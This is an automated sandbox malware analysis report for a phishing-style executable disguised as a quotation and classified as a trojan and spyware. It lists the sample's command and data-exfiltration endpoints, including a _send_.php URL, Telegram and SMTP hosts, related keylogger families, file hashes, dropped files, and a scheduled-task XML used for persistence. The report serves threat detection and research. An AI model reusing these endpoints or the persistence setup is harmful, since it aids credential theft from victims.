                                                                              http://anotherarmy.dns.army:8081QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchvbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://checkip.dyndns.org/qQUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://chrome.google.com/webstore?hl=enlBvbc.exe, 00000007.00000002.4059070573.000000000752D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000070CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/8.46.123.189$vbc.exe, 00000007.00000002.4059070573.000000000742F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.00000000073E9000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FCE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F89000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.orgvbc.exe, 00000007.00000002.4059070573.00000000073BF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.000000000742F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F5F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FCE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://chrome.google.com/webstore?hl=enPvbc.exe, 00000007.00000002.4059070573.0000000007523000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1632148313.0000000002701000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1660117333.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedQUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reallyfreegeoip.org/xml/QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.00000000073BF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
208.91.198.143 | unknown | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.112.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
208.91.199.223 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1589989
                                                                                                    Start date and time:2025-01-13 13:04:15 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 10m 2s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:17
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@16/11@6/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 254
                                                                                                    • Number of non-executed functions: 12
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 2.18.97.153, 20.109.210.53, 13.95.31.18, 52.149.20.212, 13.107.246.45
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • VT rate limit hit for: QUOTATION REQUIRED_Enatel s.r.l..bat.exe
Time | Type | Description
07:05:31 | API Interceptor | 1x Sleep call for process: QUOTATION REQUIRED_Enatel s.r.l..bat.exe modified
07:05:33 | API Interceptor | 11x Sleep call for process: powershell.exe modified
07:05:35 | API Interceptor | 1x Sleep call for process: vTAuFgZcVE.exe modified
07:05:40 | API Interceptor | 12972085x Sleep call for process: vbc.exe modified
13:05:34 | Task Scheduler | Run new task: vTAuFgZcVE path: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    132.226.8.169PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    208.91.198.143Lpjrd6Wxad.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            New Order PO#86637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                z68ORDER.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  z17invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    z47maaaaaaaaaaaaax.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        149.154.167.220Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                  6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                                                                    Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                      nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            us2.smtp.mailhostbox.comPO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.225
                                                                                                                                            m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.225
                                                                                                                                            nuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            Lpjrd6Wxad.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            reallyfreegeoip.orgRemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.32.1
                                                                                                                                            SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 104.21.32.1
                                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.80.1
                                                                                                                                            QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.80.1
                                                                                                                                            Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.64.1
                                                                                                                                            Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.32.1
                                                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.16.1
                                                                                                                                            aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.64.1
                                                                                                                                            api.telegram.orgRemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            checkip.dyndns.comRemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 193.122.130.0
                                                                                                                                            SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 158.101.44.242
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1216
                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1216
                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):5.380805901110357
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:lylWSU4xymI4RjGoUP7gZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHxvII1LZ2KRH9Ougss
                                                                                                                                            MD5:9EC965DA4B5A552C05CA371AAECAC883
                                                                                                                                            SHA1:1A26A04D746302689BE9E5392EB62437B0890702
                                                                                                                                            SHA-256:E8C19283224C6AD494CFEC5A3BE56A016EE022EA0A23770F2B3053352597E552
                                                                                                                                            SHA-512:A451B42CC48260E68D776363E3547415F0B33FAA9521993C4B31B35C1D81BB4F884831E8E4C4997AB4AE98783DD8AABEF60FDBAFE65DEF48D6B271AB32305D2A
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1583
                                                                                                                                            Entropy (8bit):5.115594213573785
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtExvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTUv
                                                                                                                                            MD5:AACDC6F58452308F338A33FB3050CC5D
                                                                                                                                            SHA1:F9E77D4B0D76A246A3A937D5BFE1F60DE7A3B314
                                                                                                                                            SHA-256:619D15E1AA0C2555670D34F3E3CD618F3E0715E14515AA1290217B25B8D17EA2
                                                                                                                                            SHA-512:875E70568130CD53F000A22D83FC0DED3C1082C0C78AECCF22B183EF29E589C089268C866C306D89E8F4BA5B9BF98FCC998F8B0E11BF8E5252F393973A773F2B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1583
                                                                                                                                            Entropy (8bit):5.115594213573785
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtExvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTUv
                                                                                                                                            MD5:AACDC6F58452308F338A33FB3050CC5D
                                                                                                                                            SHA1:F9E77D4B0D76A246A3A937D5BFE1F60DE7A3B314
                                                                                                                                            SHA-256:619D15E1AA0C2555670D34F3E3CD618F3E0715E14515AA1290217B25B8D17EA2
                                                                                                                                            SHA-512:875E70568130CD53F000A22D83FC0DED3C1082C0C78AECCF22B183EF29E589C089268C866C306D89E8F4BA5B9BF98FCC998F8B0E11BF8E5252F393973A773F2B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                                                                                            Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):948224
                                                                                                                                            Entropy (8bit):7.76634166552624
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:c8yNK1t4NK1tOqLBPitz9yZJLjsqk488RBAUt6a:rhkLyZJLjs74Bv
                                                                                                                                            MD5:DAC368E84E853ADEC2A5BB1CD87CD1C6
                                                                                                                                            SHA1:139C10CFA59C1E25039C02671010009DE25A2690
                                                                                                                                            SHA-256:ECE7DE25D48E50E93D3D60F600A7676FE24A520916844F6826B4837AC8DD7EBC
                                                                                                                                            SHA-512:823336A9F2016C7144D863000606E45B839746163D4F921150C283021DD06C6DEF082B66660888FDC70141B989F9D01F4332D3D626C030C962453C78977FE9AC
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.................0..n..........F.... ........@.. ....................................@....................................O...................................@h..p............................................ ............... ..H............text...\m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................%.......H...........a......S........j...........................................0..L.........}.....(.......(......(............s .....(!....o".....(#....o$.....(%....*.0............}........(&........('.....,5...(............s .....(.....o".....(.....o$....85....r...p.Y...((...o)...tY.......(*..........9.....s.........s+...s,...o-......o!...r...po...........,$..(!.....o!...r...po....s....o/........o0...(1.......o2...(3.......o4...(5.......o6...(7.......o8...(9.......o:...(;.........
                                                                                                                                            Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
